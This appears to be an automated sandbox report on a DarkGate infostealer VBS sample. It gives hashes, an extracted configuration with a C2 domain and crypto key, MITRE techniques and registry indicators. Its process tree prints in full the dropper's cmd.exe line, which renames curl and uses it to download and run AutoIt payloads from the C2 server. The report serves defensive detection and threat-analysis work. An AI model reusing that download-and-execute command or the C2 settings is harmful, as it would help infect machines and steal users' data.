darkgate | 9921e057693d70d2f6bf13a04abf816c10fe209cff82cb533596ed313b9d2154

General

Target

5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbs
Size

142KB
MD5

86133160c59d00c0ca11c9716ee3f546
SHA1

941b5b828aa1ae3b5a68772ec31ac06158836b3f
SHA256

9921e057693d70d2f6bf13a04abf816c10fe209cff82cb533596ed313b9d2154
SHA512

d48841717c9876c69d6134c40ffe4597a296b55252675de694b462a58ce3b915840bed844bcabe69cc88be46b521d033954256aa479a778e8adad7fce4659ca3
SSDEEP

3072:k1KicwmC8osLn8CKmbOTtLJ+1Lqa6UndLvGi6tKYgHDNbWvi:k1OjC8oenlKmbOTn3a6UnMimONb3

Score

10^/10

darkgate usr_871663321 stealer

Malware Config

Extracted

Family

darkgate

Botnet

usr_871663321

C2

http://fredlomberhfile.com

Attributes

alternative_c2_port
443
anti_analysis
true
anti_debug
true
anti_vm
true
c2_port
2351
check_disk
true
check_ram
true
check_xeon
true
crypter_au3
true
crypter_dll
false
crypter_rawstub
false
crypto_key
hQRoFscUtYUcau
internal_mutex
txtMut
minimum_disk
35
minimum_ram
7000
ping_interval
4
rootkit
true
startup_persistence
true
username
usr_871663321

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	4356	WScript.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
4080	btka.exe
3524	btka.exe
1732	Autoit3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4356 wrote to memory of 2100	4356	WScript.exe	86
PID 4356 wrote to memory of 2100	4356	WScript.exe	86
PID 2100 wrote to memory of 4080	2100	cmd.exe	88
PID 2100 wrote to memory of 4080	2100	cmd.exe	88
PID 2100 wrote to memory of 3524	2100	cmd.exe	89
PID 2100 wrote to memory of 3524	2100	cmd.exe	89
PID 2100 wrote to memory of 1732	2100	cmd.exe	92
PID 2100 wrote to memory of 1732	2100	cmd.exe	92
PID 2100 wrote to memory of 1732	2100	cmd.exe	92

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir c:\btka & cd /d c:\btka & copy c:\windows\system32\curl.exe btka.exe & btka -H "User-Agent: curl" -o Autoit3.exe http://fredlomberhfile.com:2351 & btka -o jzxqxl.au3 http://fredlomberhfile.com:2351/msibtkaymgu & Autoit3.exe jzxqxl.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2100
- - \??\c:\btka\btka.exe
    btka -H "User-Agent: curl" -o Autoit3.exe http://fredlomberhfile.com:2351
    3⤵
    - Executes dropped EXE
    PID:4080
- - \??\c:\btka\btka.exe
    btka -o jzxqxl.au3 http://fredlomberhfile.com:2351/msibtkaymgu
    3⤵
    - Executes dropped EXE
    PID:3524
- - \??\c:\btka\Autoit3.exe
    Autoit3.exe jzxqxl.au3
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\btka\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\btka\btka.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
C:\btka\btka.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
\??\c:\btka\btka.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
\??\c:\btka\jzxqxl.au3

Filesize
908KB

MD5
237ee26e8c8b322df3bd271fb9e8840f

SHA1
4542cfbf0c37d7ffb8984bbf699f1e322f75a01a

SHA256
ad72296b8e144a02c000a9866b7822062592d3741081db13cc5b0747b151c2b5

SHA512
bbf6a648749c09634e938480a9fddd6eb6f533c76a53b5188326c979799a931830fa810b3c19d0fbdfb8672fd4462d4b52ae46e2593973bdc417e43fb9ebfaa0

Download Submit
memory/1732-12-0x0000000001350000-0x0000000001750000-memory.dmp

Filesize
4.0MB

Download
memory/1732-13-0x0000000003FE0000-0x00000000040D5000-memory.dmp

Filesize
980KB

Download
memory/1732-14-0x00000000048B0000-0x0000000004C73000-memory.dmp

Filesize
3.8MB

Download
memory/1732-15-0x0000000003FE0000-0x00000000040D5000-memory.dmp

Filesize
980KB

Download
memory/1732-16-0x00000000048B0000-0x0000000004C73000-memory.dmp

Filesize
3.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads